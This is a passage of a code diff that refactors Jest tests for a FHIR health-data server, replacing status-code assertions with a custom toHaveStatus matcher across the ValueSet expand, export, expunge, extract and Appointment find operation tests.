       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(
@@ -1075,13 +1075,13 @@ describe('Expand', () => {
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSetResource);
-    expect(valueSetRes.status).toStrictEqual(201);
+    expect(valueSetRes).toHaveStatus(201);
     const valueSet = valueSetRes.body as ValueSet;
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&count=200&filter=doggo`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toHaveLength(1);
@@ -1116,13 +1116,13 @@ describe('Expand', () => {
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSetResource);
-    expect(valueSetRes.status).toStrictEqual(201);
+    expect(valueSetRes).toHaveStatus(201);
     const valueSet = valueSetRes.body as ValueSet;
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&filter=a&count=200`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toBeUndefined();
@@ -1133,7 +1133,7 @@ describe('Expand', () => {
       .get(`/fhir/R4/ValueSet/$expand?url=http://hl7.org/fhir/ValueSet/task-status|4.0.1&filter=`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(12);
   });
@@ -1143,7 +1143,7 @@ describe('Expand', () => {
       .get(`/fhir/R4/ValueSet/$expand?url=http://hl7.org/fhir/ValueSet/task-status|4.0.1&filter=a'`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toBeUndefined();
   });
@@ -1153,7 +1153,7 @@ describe('Expand', () => {
       .get(`/fhir/R4/ValueSet/$expand?url=http://terminology.hl7.org/ValueSet/v3-RoleCode&filter=MT`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(1);
     expect(expansion.contains).toContainEqual<ValueSetExpansionContains>({
@@ -1170,7 +1170,7 @@ describe('Expand', () => {
       )
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(1);
     expect(expansion.contains).toContainEqual<ValueSetExpansionContains>({
@@ -1207,7 +1207,7 @@ describe('Expand', () => {
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(preexpanded);
-    expect(preexpandedRes.status).toStrictEqual(201);
+    expect(preexpandedRes).toHaveStatus(201);
     const preexpandedValueSet = preexpandedRes.body as ValueSet;
 
     const include: ValueSet = {
@@ -1231,13 +1231,13 @@ describe('Expand', () => {
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(include);
-    expect(valueSetRes.status).toStrictEqual(201);
+    expect(valueSetRes).toHaveStatus(201);
     const valueSet = valueSetRes.body as ValueSet;
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&filter=reported`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toHaveLength(3);
@@ -1298,17 +1298,17 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
     const vsRes = await request(app)
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSet);
-    expect(vsRes.status).toStrictEqual(201);
+    expect(vsRes).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&filter=hives`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toStrictEqual<ValueSetExpansionContains[]>([
@@ -1342,17 +1342,17 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
     const vsRes = await request(app)
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSet);
-    expect(vsRes.status).toStrictEqual(201);
+    expect(vsRes).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${valueSet.url}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toStrictEqual<ValueSetExpansionContains[]>([
@@ -1417,17 +1417,17 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
     const vsRes = await request(app)
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSet);
-    expect(vsRes.status).toStrictEqual(201);
+    expect(vsRes).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&filter=non&displayLanguage=fr`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toStrictEqual<ValueSetExpansionContains[]>([
@@ -1462,17 +1462,17 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
     const vsRes = await request(app)
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSet);
-    expect(vsRes.status).toStrictEqual(201);
+    expect(vsRes).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&filter=ID`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toStrictEqual<ValueSetExpansionContains[]>([
@@ -1523,17 +1523,17 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
     const vsRes = await request(app)
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSet);
-    expect(vsRes.status).toStrictEqual(201);
+    expect(vsRes).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url)}&filter=invalid&displayLanguage=fr`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(expansion.contains).toStrictEqual<ValueSetExpansionContains[]>([
@@ -1552,13 +1552,13 @@ describe('Expand', () => {
         url,
         content: 'not-present',
       } satisfies CodeSystem);
-    expect(csRes.status).toStrictEqual(201);
+    expect(csRes).toHaveStatus(201);
 
     const superAdminToken = await initTestAuth({ superAdmin: true });
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${url}&filter=clien`)
       .set('Authorization', 'Bearer ' + superAdminToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.expansion.contains[0].display).toStrictEqual('ClientApplication');
   });
 });

--- a/packages/server/src/fhir/operations/explain.test.ts
+++ b/packages/server/src/fhir/operations/explain.test.ts
@@ -35,7 +35,7 @@ describe('$explain', () => {
           { name: 'format', valueString: format },
         ],
       } satisfies Parameters);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const output = res1.body.parameter as ParametersParameter[];
     expect(output).toHaveLength(3);
@@ -63,7 +63,7 @@ describe('$explain', () => {
         ],
       } satisfies Parameters);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const output = res.body.parameter as ParametersParameter[];
     expect(output).toContainEqual(expect.objectContaining({ name: 'countEstimate', valueInteger: expect.any(Number) }));
     expect(output).toContainEqual(expect.objectContaining({ name: 'countAccurate', valueInteger: expect.any(Number) }));
@@ -81,7 +81,7 @@ describe('$explain', () => {
         parameter: [{ name: 'query', valueString: 'Patient?active=true' }],
       } satisfies Parameters);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const output = res.body.parameter as ParametersParameter[];
     expect(output.find((p) => p.name === 'countEstimate')).toBeUndefined();
     expect(output.find((p) => p.name === 'countAccurate')).toBeUndefined();
@@ -104,7 +104,7 @@ describe('$explain', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'query', valueString: 'Patient?active=true' }],
       } satisfies Parameters);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const output = res1.body.parameter as ParametersParameter[];
     const plan = output.find((p) => p.name === 'explain')?.valueString;

--- a/packages/server/src/fhir/operations/export.test.ts
+++ b/packages/server/src/fhir/operations/export.test.ts
@@ -44,7 +44,7 @@ describe('Export', () => {
           { system: 'email', value: 'alice@example.com' },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Create observation
     const res2 = await request(app)
@@ -57,7 +57,7 @@ describe('Export', () => {
         code: { text: 'test' },
         subject: { reference: `Patient/${res1.body.id}` },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Start the export
     const initRes = await request(app)
@@ -66,7 +66,7 @@ describe('Export', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(initRes.status).toBe(202);
+    expect(initRes).toHaveStatus(202);
     expect(initRes.headers['content-location']).toBeDefined();
 
     // Check the export status
@@ -76,7 +76,7 @@ describe('Export', () => {
     const statusRes = await request(app)
       .get(contentLocation.pathname)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(statusRes.status).toBe(200);
+    expect(statusRes).toHaveStatus(200);
     const resBody = statusRes.body;
 
     const output = resBody?.output as BulkDataExportOutput[];
@@ -114,7 +114,7 @@ describe('Export', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(initRes.status).toBe(202);
+    expect(initRes).toHaveStatus(202);
     expect(initRes.headers['content-location']).toBeDefined();
     await waitForAsyncJob(initRes.headers['content-location'], app, accessToken);
   });
@@ -129,7 +129,7 @@ describe('Export', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(initRes.status).toBe(202);
+    expect(initRes).toHaveStatus(202);
     expect(initRes.headers['content-location']).toBeDefined();
     await waitForAsyncJob(initRes.headers['content-location'], app, accessToken);
   });

--- a/packages/server/src/fhir/operations/expunge.test.ts
+++ b/packages/server/src/fhir/operations/expunge.test.ts
@@ -38,7 +38,7 @@ describe('Expunge', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Expunge single resource', async () => {
@@ -62,7 +62,7 @@ describe('Expunge', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Expect the patient to be removed from both tables
     expect(await existsInDatabase('Patient', patient.id)).toBe(false);
@@ -136,7 +136,7 @@ describe('Expunge', () => {
       .set('X-Medplum', 'extended')
       .send({});
     if (opts.outcome === 'success') {
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
 
       // Project expunge destroys the caller's client/membership; poll with super admin credentials.
       const pollAccessToken = opts.superAdmin ? accessTokenToUse : superAdminAccessToken;
@@ -157,7 +157,7 @@ describe('Expunge', () => {
       expect(await existsInDatabase('ClientApplication', linkedClient.id)).toBe(linkedResourcesExist);
       expect(await existsInDatabase('ProjectMembership', linkedMembership.id)).toBe(linkedResourcesExist);
     } else {
-      expect(res.status).toBe(403);
+      expect(res).toHaveStatus(403);
     }
   });
 
@@ -190,7 +190,7 @@ describe('Expunge', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(res.status).toBe(202);
+    expect(res).toHaveStatus(202);
 
     const asyncJob = await waitForAsyncJob(res.headers['content-location'], app, accessToken);
     // The job must complete cleanly: the Expunger iterates every resource type, and
@@ -224,7 +224,7 @@ describe('Expunge', () => {
       .send({});
     // The async job is accepted, but the project-scoped repo never finds the
     // foreign patient, so it is left untouched.
-    expect(res.status).toBe(202);
+    expect(res).toHaveStatus(202);
 
     await waitForAsyncJob(res.headers['content-location'], app, accessToken);
 

--- a/packages/server/src/fhir/operations/extract.test.ts
+++ b/packages/server/src/fhir/operations/extract.test.ts
@@ -370,7 +370,7 @@ describe('QuestionnaireResponse/$extract', () => {
       .get(`/fhir/R4/QuestionnaireResponse/${response.id}/$extract`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -474,7 +474,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: { ...response, questionnaire: undefined } },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -572,7 +572,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: { ...response, questionnaire: undefined } },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -597,7 +597,7 @@ describe('QuestionnaireResponse/$extract', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'questionnaire', resource: questionnaire }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -619,7 +619,7 @@ describe('QuestionnaireResponse/$extract', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'questionnaire-response', resource: { ...response, questionnaire: undefined } }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -644,7 +644,7 @@ describe('QuestionnaireResponse/$extract', () => {
           },
         ],
       } satisfies Parameters);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -692,7 +692,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -734,7 +734,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -772,7 +772,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -807,7 +807,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [
@@ -849,7 +849,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -861,7 +861,7 @@ describe('QuestionnaireResponse/$extract', () => {
       .post(`/fhir/R4/`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(batch);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const patient = await repo.readResource<Patient>('Patient', id);
     expect(patient.gender).toBe('unknown');
@@ -954,7 +954,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: r },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 
@@ -968,7 +968,7 @@ describe('QuestionnaireResponse/$extract', () => {
       .post(`/fhir/R4/`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(batch);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const result = res2.body as Bundle;
     expect(result.entry?.map((e) => e.response?.status)).toStrictEqual(['201']);
   });
@@ -1081,7 +1081,7 @@ describe('QuestionnaireResponse/$extract', () => {
           { name: 'questionnaire-response', resource: response },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Bundle');
     const batch = res.body as Bundle;
 

--- a/packages/server/src/fhir/operations/find.test.ts
+++ b/packages/server/src/fhir/operations/find.test.ts
@@ -298,7 +298,7 @@ describe('Appointment/$find', () => {
     });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
 
     expect(response.body).toMatchObject({
       resourceType: 'Bundle',
@@ -357,7 +357,7 @@ describe('Appointment/$find', () => {
     });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
 
     (response.body as Bundle<Appointment>).entry?.forEach((entry) => {
       expect(entry).toMatchObject({
@@ -432,7 +432,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).not.toHaveProperty('issue');
     expect(response.body).toMatchObject({ resourceType: 'Bundle', type: 'searchset' });
     expect(response.body).not.toHaveProperty('entry');
@@ -480,7 +480,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
     expect(starts).toEqual([
       new Date('2026-03-17T13:00:00-04:00').toISOString(),
@@ -533,7 +533,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
     expect(starts).toContain(new Date('2026-03-17T13:00:00-04:00').toISOString()); // 1pm EDT — ok
     expect(starts).not.toContain(new Date('2026-03-17T14:00:00-04:00').toISOString()); // 2pm EDT — blocked
@@ -601,7 +601,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).not.toHaveProperty('issue');
 
     expect((response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start)).toEqual([
@@ -629,7 +629,7 @@ describe('Appointment/$find', () => {
         },
       },
     ]);
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('errors when `service-type-reference` parameter cannot be resolved', async () => {
@@ -649,7 +649,7 @@ describe('Appointment/$find', () => {
         },
       },
     ]);
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('errors when `schedule` parameter is omitted', async () => {
@@ -658,7 +658,7 @@ describe('Appointment/$find', () => {
       end: new Date('2026-03-21T00:00:00-04:00').toISOString(),
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toMatch(/schedule/);
   });
 
@@ -669,7 +669,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
       schedule: 'Schedule/00000000-0000-0000-0000-000000000001',
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Loading schedule failed');
     expect(response.body.issue[0].expression).toEqual(['Parameters.schedule[0]']);
   });
@@ -707,7 +707,7 @@ describe('Appointment/$find', () => {
         expression: ['Parameters.schedule[0]'],
       },
     ]);
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('errors on a schedule with multiple actors', async () => {
@@ -734,7 +734,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
       schedule: `Schedule/${schedule.id}`,
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Scheduling only supported on schedules with exactly one actor');
   });
 
@@ -768,7 +768,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Schedule is not schedulable for requested service type');
     expect(response.body.issue[0].expression).toEqual(['Parameters.schedule[1]']);
   });
@@ -811,7 +811,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe("Scheduling parameters attribute 'duration' does not match");
 
     expect(response.body.issue[0].expression).toEqual([
@@ -850,7 +850,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe(
       "Scheduling parameters attribute 'alignmentTimezone' does not match"
     );
@@ -919,7 +919,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).not.toHaveProperty('issue');
 
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
@@ -961,7 +961,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${practitionerSchedule.id}`, `Schedule/${locationSchedule.id}`],
     });
 
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Search range starts after schedule planning horizon ends');
     expect(response.body.issue[0].expression).toEqual(['Parameters.schedule[1]']);
   });
@@ -987,7 +987,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).not.toHaveProperty('issue');
 
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
@@ -1036,7 +1036,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${scheduleA.id}`, `Schedule/${scheduleB.id}`],
     });
 
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body.entry).toHaveLength(2);
   });
 
@@ -1074,7 +1074,7 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${practitionerSchedule.id}`, `Schedule/${locationSchedule.id}`],
     });
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
 
     expect(response.body).toMatchObject({
       resourceType: 'Bundle',
@@ -1170,7 +1170,7 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
     });
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).toMatchObject({
       resourceType: 'Bundle',
       type: 'searchset',
@@ -1202,7 +1202,7 @@ describe('Appointment/$find', () => {
     });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body.entry).toHaveLength(20);
   });
 
@@ -1228,7 +1228,7 @@ describe('Appointment/$find', () => {
     });
 
     expect(smallResponse.body).not.toHaveProperty('issue');
-    expect(smallResponse.status).toBe(200);
+    expect(smallResponse).toHaveStatus(200);
     expect(smallResponse.body.entry).toHaveLength(1);
 
     const largeResponse = await makeRequest({
@@ -1240,7 +1240,7 @@ describe('Appointment/$find', () => {
     });
 
     expect(largeResponse.body).not.toHaveProperty('issue');
-    expect(largeResponse.status).toBe(200);
+    expect(largeResponse).toHaveStatus(200);
     expect(largeResponse.body.entry).toHaveLength(1000);
   });
 
@@ -1271,7 +1271,7 @@ describe('Appointment/$find', () => {
         },
       },
     ]);
-    expect(smallResponse.status).toBe(400);
+    expect(smallResponse).toHaveStatus(400);
 
     const largeResponse = await makeRequest({
       start: new Date('2026-01-01T00:00:00-05:00').toISOString(),
@@ -1290,7 +1290,7 @@ describe('Appointment/$find', () => {
         },
       },
     ]);
-    expect(largeResponse.status).toBe(400);
+    expect(largeResponse).toHaveStatus(400);
   });
 
   test('it works when HealthcareService.type has no codes', async () => {
@@ -1342,7 +1342,7 @@ describe('Appointment/$find', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body).toHaveProperty('entry');
     expect(response.body.entry).toHaveLength(4);
   });

--- a/packages/server/src/fhir/operations/find.test.ts
+++ b/packages/server/src/fhir/operations/find.test.ts
@@ -297,7 +297,6 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${practitionerSchedule.id}`, `Schedule/${locationSchedule.id}`],
     });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     expect(response.body).toMatchObject({
@@ -356,7 +355,6 @@ describe('Appointment/$find', () => {
       schedule: `Schedule/${practitionerSchedule.id}`,
     });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     (response.body as Bundle<Appointment>).entry?.forEach((entry) => {
@@ -433,7 +431,6 @@ describe('Appointment/$find', () => {
     });
 
     expect(response).toHaveStatus(200);
-    expect(response.body).not.toHaveProperty('issue');
     expect(response.body).toMatchObject({ resourceType: 'Bundle', type: 'searchset' });
     expect(response.body).not.toHaveProperty('entry');
   });
@@ -602,7 +599,6 @@ describe('Appointment/$find', () => {
     });
 
     expect(response).toHaveStatus(200);
-    expect(response.body).not.toHaveProperty('issue');
 
     expect((response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start)).toEqual([
       '2026-03-16T19:00:00.000Z', // 12pm Phoenix / 9am Honolulu
@@ -920,7 +916,6 @@ describe('Appointment/$find', () => {
     });
 
     expect(response).toHaveStatus(200);
-    expect(response.body).not.toHaveProperty('issue');
 
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
 
@@ -988,7 +983,6 @@ describe('Appointment/$find', () => {
     });
 
     expect(response).toHaveStatus(200);
-    expect(response.body).not.toHaveProperty('issue');
 
     const starts = (response.body as Bundle<Appointment>).entry?.map((e) => e.resource?.start) ?? [];
 
@@ -1073,7 +1067,6 @@ describe('Appointment/$find', () => {
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
